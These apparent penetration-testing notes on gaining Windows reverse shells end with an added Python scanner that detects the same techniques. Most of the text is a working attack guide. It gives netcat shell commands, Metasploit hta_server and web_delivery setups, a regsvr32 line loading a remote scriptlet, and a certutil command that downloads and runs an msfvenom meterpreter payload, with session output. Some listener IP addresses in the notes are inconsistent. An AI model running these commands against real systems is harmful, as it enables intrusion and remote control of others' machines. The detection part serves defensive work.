Windows reverse shells

1. nc

nc (netcat) is a very powerful networking tool.
Windows 7 target:
nc.exe -lvvp 6666 -e cmd.exe

Linux attacker:
nc 192.168.10.145 6666

Result: a shell.

2. mshta.exe

Mshta.exe is the Windows utility responsible for interpreting and running HTA (HTML Application) files; it can run HTML files that contain JavaScript or VBScript. It is also a program that ships with Windows.

Launch the HTA attack through Metasploit's HTA Web Server module:

use exploit/windows/misc/hta_server
show options
set srvhost 192.168.10.1
msf5 exploit(windows/misc/hta_server) >exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.


msf5 exploit(windows/misc/hta_server) > [*] Server started
[*] Started reverse TCP handler on 192.168.0.112:4444 
[*] Using URL: http://192.168.10.1:8080/a0nsMafZ8oN.hta
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/misc/hta_server) > sessions

Active sessions
===============

  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  1         meterpreter x86/windows  hsm-PC\hsm @ HSM-PC  192.168.0.112:4444 -> 192.168.0.112:32947 (192.168.10.145)
msf5 exploit(windows/misc/hta_server) > shell
[-] Unknown command: shell.
msf5 exploit(windows/misc/hta_server) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2464 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>

3. Regsvr32.exe

Launch Regsvr32 through Metasploit's Web Delivery module.
Regsvr32 is a program that ships with Windows.

msf5 > use exploit/multi/script/web_delivery 
msf5 exploit(multi/script/web_delivery) > set srvhost 192.168.10.1
srvhost => 192.168.10.1
msf5 exploit(multi/script/web_delivery) > set target 3   // can be interpreted and executed by ..

msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set lhost  192.169.10.1
lhost => 192.169.10.1
msf5 exploit(multi/script/web_delivery) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 192.169.10.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Using URL: http://192.168.10.1:8080/mrSJR3O4HQz7
msf5 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.169.10.1:8080/mrSJR3O4HQz7.sct scrobj.dll

4. Certutil.exe

Certutil.exe is a command-line program installed as part of Certificate Services; it can be used to run a malicious exe on the target machine and obtain a meterpreter session.
Linux (attacker):

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.160.10.1 lport=6666 -f exe > shell.exe

Windows (target):

certutil.exe -urlcache -split -f http://192.168.10.1:8000/shell.exe & shell.exe

certutil.exe -urlcache -split -f http://192.168.10.1:8000/shell.exe delete
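The detection-side counterpart to the four techniques above, as an added example that is not part of the original notes: a small Python scanner that flags process-creation records whose command lines match the living-off-the-land patterns shown on this page (regsvr32 loading a remote /i: scriptlet via scrobj.dll, certutil -urlcache downloading a file, mshta launching a remote HTA, and nc with -e). The sample events, the 192.0.2.10 address, the file names and the rule names are all constructed for this example.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style); the
# addresses, paths and URLs are made up for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://192.0.2.10:8080/payload.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://192.0.2.10:8000/shell.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://192.0.2.10:8080/index.hta"},
    {"Image": r"C:\Users\user\nc.exe",
     "CommandLine": r"nc.exe -lvvp 6666 -e cmd.exe"},
    # Two benign uses of the same binaries that must NOT be flagged.
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Users\user\setup.msi SHA256"},
]

# (rule name, executable basenames, command-line pattern). Matching on the
# arguments rather than on the binary alone keeps legitimate admin use quiet.
RULES = [
    ("regsvr32_remote_scriptlet", ("regsvr32.exe",), r"/i:\s*https?://|scrobj\.dll"),
    ("certutil_url_download", ("certutil.exe",), r"-urlcache\b.*\s-f\s+https?://"),
    ("mshta_remote_hta", ("mshta.exe",), r"https?://|javascript:|vbscript:"),
    ("netcat_exec_shell", ("nc.exe", "nc64.exe", "ncat.exe"), r"\s-e\s+\S*(cmd|powershell)"),
]


def classify(event):
    """Return the names of all rules that a single process-creation event matches."""
    basename = event["Image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["CommandLine"]
    return [name for name, exes, pattern in RULES
            if basename in exes and re.search(pattern, cmdline, re.IGNORECASE)]


def scan(events):
    """Return (command line, matched rules) for every event that triggers a rule."""
    alerts = []
    for event in events:
        hits = classify(event)
        if hits:
            alerts.append((event["CommandLine"], hits))
    return alerts


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmdline)
```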